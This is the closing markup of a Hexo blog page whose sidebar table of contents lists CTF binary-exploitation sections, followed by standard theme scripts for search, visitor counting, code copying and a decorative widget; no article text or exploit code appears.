class="nav-number">2.8.</span> <span class="nav-text">syscall</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#其他"><span class="nav-number">2.9.</span> <span class="nav-text">其他</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#vdso-vsyscall"><span class="nav-number">3.</span> <span class="nav-text">vdso &amp; vsyscall</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#jarvis-typo"><span class="nav-number">4.</span> <span class="nav-text">Jarvis-typo</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#de1ctf-2019-unprintable"><span class="nav-number">5.</span> <span class="nav-text">de1ctf-2019-unprintable</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#wmctf-2020-cfgo-checkin"><span class="nav-number">6.</span> <span class="nav-text">wmctf-2020-cfgo-CheckIn</span></a></li></ol></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2021</span>
  <span class="with-love" id="animate">
    <i class="fa fa-gg-circle"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">w4rd3n</span>

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-area-chart"></i>
    </span>
    
    <span title="站点总字数">823k</span>
  

  
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item-icon">
      <i class="fa fa-coffee"></i>
    </span>
    
    <span title="站点阅读时长">12:28</span>
  
</div>









        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv" title="总访客量">
      <i class="fa fa-user"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
    </span>
  

  
    <span class="site-pv" title="总访问量">
      <i class="fa fa-eye"></i>
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
    </span>
  
</div>









        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
          <span id="scrollpercent"><span>0</span>%</span>
        
      </div>
    

    
	
    

    
  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>














  
    
      
  
  <script type="text/javascript" color="0,0,255" opacity="0.5" zindex="-1" count="99" src="/lib/canvas-nest/canvas-nest.min.js"></script>













  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=6.5.0"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=6.5.0"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.5.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.5.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.5.0"></script>



  



  










  

  <script type="text/javascript">
    // Popup Window;
    var isfetched = false;
    var isXml = true;
    // Search DB path;
    var search_path = "search.xml";
    if (search_path.length === 0) {
      search_path = "search.xml";
    } else if (/json$/i.test(search_path)) {
      isXml = false;
    }
    var path = "/" + search_path;
    // monitor main search box;

    var onPopupClose = function (e) {
      $('.popup').hide();
      $('#local-search-input').val('');
      $('.search-result-list').remove();
      $('#no-result').remove();
      $(".local-search-pop-overlay").remove();
      $('body').css('overflow', '');
    }

    function proceedsearch() {
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay"></div>')
        .css('overflow', 'hidden');
      $('.search-popup-overlay').click(onPopupClose);
      $('.popup').toggle();
      var $localSearchInput = $('#local-search-input');
      $localSearchInput.attr("autocapitalize", "none");
      $localSearchInput.attr("autocorrect", "off");
      $localSearchInput.focus();
    }

    // search function;
    var searchFunc = function(path, search_id, content_id) {
      'use strict';

      // start loading animation
      $("body")
        .append('<div class="search-popup-overlay local-search-pop-overlay">' +
          '<div id="search-loading-icon">' +
          '<i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>' +
          '</div>' +
          '</div>')
        .css('overflow', 'hidden');
      $("#search-loading-icon").css('margin', '20% auto 0 auto').css('text-align', 'center');

      

      $.ajax({
        url: path,
        dataType: isXml ? "xml" : "json",
        async: true,
        success: function(res) {
          // get the contents from search data
          isfetched = true;
          $('.popup').detach().appendTo('.header-inner');
          var datas = isXml ? $("entry", res).map(function() {
            return {
              title: $("title", this).text(),
              content: $("content",this).text(),
              url: $("url" , this).text()
            };
          }).get() : res;
          var input = document.getElementById(search_id);
          var resultContent = document.getElementById(content_id);
          var inputEventFunction = function() {
            var searchText = input.value.trim().toLowerCase();
            var keywords = searchText.split(/[\s\-]+/);
            if (keywords.length > 1) {
              keywords.push(searchText);
            }
            var resultItems = [];
            if (searchText.length > 0) {
              // perform local searching
              datas.forEach(function(data) {
                var isMatch = false;
                var hitCount = 0;
                var searchTextCount = 0;
                var title = data.title.trim();
                var titleInLowerCase = title.toLowerCase();
                var content = data.content.trim().replace(/<[^>]+>/g,"");
                
                var contentInLowerCase = content.toLowerCase();
                var articleUrl = decodeURIComponent(data.url);
                var indexOfTitle = [];
                var indexOfContent = [];
                // only match articles with not empty titles
                if(title != '') {
                  keywords.forEach(function(keyword) {
                    function getIndexByWord(word, text, caseSensitive) {
                      var wordLen = word.length;
                      if (wordLen === 0) {
                        return [];
                      }
                      var startPosition = 0, position = [], index = [];
                      if (!caseSensitive) {
                        text = text.toLowerCase();
                        word = word.toLowerCase();
                      }
                      while ((position = text.indexOf(word, startPosition)) > -1) {
                        index.push({position: position, word: word});
                        startPosition = position + wordLen;
                      }
                      return index;
                    }

                    indexOfTitle = indexOfTitle.concat(getIndexByWord(keyword, titleInLowerCase, false));
                    indexOfContent = indexOfContent.concat(getIndexByWord(keyword, contentInLowerCase, false));
                  });
                  if (indexOfTitle.length > 0 || indexOfContent.length > 0) {
                    isMatch = true;
                    hitCount = indexOfTitle.length + indexOfContent.length;
                  }
                }

                // show search results

                if (isMatch) {
                  // sort index by position of keyword

                  [indexOfTitle, indexOfContent].forEach(function (index) {
                    index.sort(function (itemLeft, itemRight) {
                      if (itemRight.position !== itemLeft.position) {
                        return itemRight.position - itemLeft.position;
                      } else {
                        return itemLeft.word.length - itemRight.word.length;
                      }
                    });
                  });

                  // merge hits into slices

                  function mergeIntoSlice(text, start, end, index) {
                    var item = index[index.length - 1];
                    var position = item.position;
                    var word = item.word;
                    var hits = [];
                    var searchTextCountInSlice = 0;
                    while (position + word.length <= end && index.length != 0) {
                      if (word === searchText) {
                        searchTextCountInSlice++;
                      }
                      hits.push({position: position, length: word.length});
                      var wordEnd = position + word.length;

                      // move to next position of hit

                      index.pop();
                      while (index.length != 0) {
                        item = index[index.length - 1];
                        position = item.position;
                        word = item.word;
                        if (wordEnd > position) {
                          index.pop();
                        } else {
                          break;
                        }
                      }
                    }
                    searchTextCount += searchTextCountInSlice;
                    return {
                      hits: hits,
                      start: start,
                      end: end,
                      searchTextCount: searchTextCountInSlice
                    };
                  }

                  var slicesOfTitle = [];
                  if (indexOfTitle.length != 0) {
                    slicesOfTitle.push(mergeIntoSlice(title, 0, title.length, indexOfTitle));
                  }

                  var slicesOfContent = [];
                  while (indexOfContent.length != 0) {
                    var item = indexOfContent[indexOfContent.length - 1];
                    var position = item.position;
                    var word = item.word;
                    // cut out 100 characters
                    var start = position - 20;
                    var end = position + 80;
                    if(start < 0){
                      start = 0;
                    }
                    if (end < position + word.length) {
                      end = position + word.length;
                    }
                    if(end > content.length){
                      end = content.length;
                    }
                    slicesOfContent.push(mergeIntoSlice(content, start, end, indexOfContent));
                  }

                  // sort slices in content by search text's count and hits' count

                  slicesOfContent.sort(function (sliceLeft, sliceRight) {
                    if (sliceLeft.searchTextCount !== sliceRight.searchTextCount) {
                      return sliceRight.searchTextCount - sliceLeft.searchTextCount;
                    } else if (sliceLeft.hits.length !== sliceRight.hits.length) {
                      return sliceRight.hits.length - sliceLeft.hits.length;
                    } else {
                      return sliceLeft.start - sliceRight.start;
                    }
                  });

                  // select top N slices in content

                  var upperBound = parseInt('1');
                  if (upperBound >= 0) {
                    slicesOfContent = slicesOfContent.slice(0, upperBound);
                  }

                  // highlight title and content

                  function highlightKeyword(text, slice) {
                    var result = '';
                    var prevEnd = slice.start;
                    slice.hits.forEach(function (hit) {
                      result += text.substring(prevEnd, hit.position);
                      var end = hit.position + hit.length;
                      result += '<b class="search-keyword">' + text.substring(hit.position, end) + '</b>';
                      prevEnd = end;
                    });
                    result += text.substring(prevEnd, slice.end);
                    return result;
                  }

                  var resultItem = '';

                  if (slicesOfTitle.length != 0) {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + highlightKeyword(title, slicesOfTitle[0]) + "</a>";
                  } else {
                    resultItem += "<li><a href='" + articleUrl + "' class='search-result-title'>" + title + "</a>";
                  }

                  slicesOfContent.forEach(function (slice) {
                    resultItem += "<a href='" + articleUrl + "'>" +
                      "<p class=\"search-result\">" + highlightKeyword(content, slice) +
                      "...</p>" + "</a>";
                  });

                  resultItem += "</li>";
                  resultItems.push({
                    item: resultItem,
                    searchTextCount: searchTextCount,
                    hitCount: hitCount,
                    id: resultItems.length
                  });
                }
              })
            };
            if (keywords.length === 1 && keywords[0] === "") {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-search fa-5x" /></div>'
            } else if (resultItems.length === 0) {
              resultContent.innerHTML = '<div id="no-result"><i class="fa fa-frown-o fa-5x" /></div>'
            } else {
              resultItems.sort(function (resultLeft, resultRight) {
                if (resultLeft.searchTextCount !== resultRight.searchTextCount) {
                  return resultRight.searchTextCount - resultLeft.searchTextCount;
                } else if (resultLeft.hitCount !== resultRight.hitCount) {
                  return resultRight.hitCount - resultLeft.hitCount;
                } else {
                  return resultRight.id - resultLeft.id;
                }
              });
              var searchResultList = '<ul class=\"search-result-list\">';
              resultItems.forEach(function (result) {
                searchResultList += result.item;
              })
              searchResultList += "</ul>";
              resultContent.innerHTML = searchResultList;
            }
          }

          if ('auto' === 'auto') {
            input.addEventListener('input', inputEventFunction);
          } else {
            $('.search-icon').click(inputEventFunction);
            input.addEventListener('keypress', function (event) {
              if (event.keyCode === 13) {
                inputEventFunction();
              }
            });
          }

          // remove loading animation
          $(".local-search-pop-overlay").remove();
          $('body').css('overflow', '');

          proceedsearch();
        }
      });
    }

    // handle and trigger popup window;
    $('.popup-trigger').click(function(e) {
      e.stopPropagation();
      if (isfetched === false) {
        searchFunc(path, 'local-search-input', 'local-search-result');
      } else {
        proceedsearch();
      };
    });

    $('.popup-btn-close').click(onPopupClose);
    $('.popup').click(function(e){
      e.stopPropagation();
    });
    $(document).on('keyup', function (event) {
      var shouldDismissSearchPopup = event.which === 27 &&
        $('.search-popup').is(':visible');
      if (shouldDismissSearchPopup) {
        onPopupClose();
      }
    });
  </script>





  

  
  <script>
    
    function addCount(Counter) {
      var $visitors = $(".leancloud_visitors");
      var url = $visitors.attr('id').trim();
      var title = $visitors.attr('data-flag-title').trim();

      Counter('get', '/classes/Counter', { where: JSON.stringify({ url }) })
        .done(function ({ results }) {
          if (results.length > 0) {
            var counter = results[0];
            
            Counter('put', `/classes/Counter/${counter.objectId}`, JSON.stringify({ time: { "__op":"Increment", "amount":1 } }))
            
            .done(function () {
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(counter.time + 1);
            })
            
            .fail(function ({ responseJSON }) {
                console.log('Failed to save Visitor num, with error message: ' + responseJSON.error);
            })
          } else {
            
              Counter('post', '/classes/Counter', JSON.stringify({ title: title, url: url, time: 1}))
                .done(function () {
                  var $element = $(document.getElementById(url));
                  $element.find('.leancloud-visitors-count').text(1);
                })
                .fail(function () {
                  console.log('Failed to create');
                });
            
          }
        })
      .fail(function ({ responseJSON }) {
        console.log('LeanCloud Counter Error:' + responseJSON.code + " " + responseJSON.error);
      });
    }
    

    $(function() {
      $.get('https://app-router.leancloud.cn/2/route?appId=' + "no3Ip4mNLc3JyF1AeTy8LrAm-gzGzoHsz")
        .done(function ({ api_server }) {
          var Counter = function (method, url, data) {
            return $.ajax({
              method: method,
              url: `https://${api_server}/1.1${url}`,
              headers: {
                'X-LC-Id': "no3Ip4mNLc3JyF1AeTy8LrAm-gzGzoHsz",
                'X-LC-Key': "UvlYMzpJKw0Jrw61V5BA5ifU",
                'Content-Type': 'application/json',
              },
              data: data,
            });
          };
          
          addCount(Counter);
          
        })
    });
  </script>



  

  

  

  
  

  
  

  


  
  

  

  

  

  

  
  <style>
    .copy-btn {
      display: inline-block;
      padding: 6px 12px;
      font-size: 13px;
      font-weight: 700;
      line-height: 20px;
      color: #333;
      white-space: nowrap;
      vertical-align: middle;
      cursor: pointer;
      background-color: #eee;
      background-image: linear-gradient(#fcfcfc, #eee);
      border: 1px solid #d5d5d5;
      border-radius: 3px;
      user-select: none;
      outline: 0;
    }

    .highlight-wrap .copy-btn {
      transition: opacity .3s ease-in-out;
      opacity: 0;
      padding: 2px 6px;
      position: absolute;
      right: 4px;
      top: 8px;
    }

    .highlight-wrap:hover .copy-btn,
    .highlight-wrap .copy-btn:focus {
      opacity: 1
    }

    .highlight-wrap {
      position: relative;
    }
  </style>
  <script>
    $('.highlight').each(function (i, e) {
      var $wrap = $('<div>').addClass('highlight-wrap')
      $(e).after($wrap)
      $wrap.append($('<button>').addClass('copy-btn').append('复制').on('click', function (e) {
        var code = $(this).parent().find('.code').find('.line').map(function (i, e) {
          return $(e).text()
        }).toArray().join('\n')
        var ta = document.createElement('textarea')
        document.body.appendChild(ta)
        ta.style.position = 'absolute'
        ta.style.top = '0px'
        ta.style.left = '0px'
        ta.value = code
        ta.select()
        ta.focus()
        var result = document.execCommand('copy')
        document.body.removeChild(ta)
        
        $(this).blur()
      })).on('mouseleave', function (e) {
        var $b = $(this).find('.copy-btn')
        setTimeout(function () {
          $b.text('复制')
        }, 300)
      }).append(e)
    })
  </script>


  

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery-backstretch/2.0.4/jquery.backstretch.min.js"></script>;
  <script>
  //$("body").backstretch("/images/background.jpg");
  </script>
  
  <script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>
  
<script src="/live2dw/lib/L2Dwidget.min.js?0c58a1486de42ac6cc1c59c7d98ae887"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":false},"log":false});</script><!-- hexo-inject:begin --><!-- hexo-inject:end --></body>
</html>
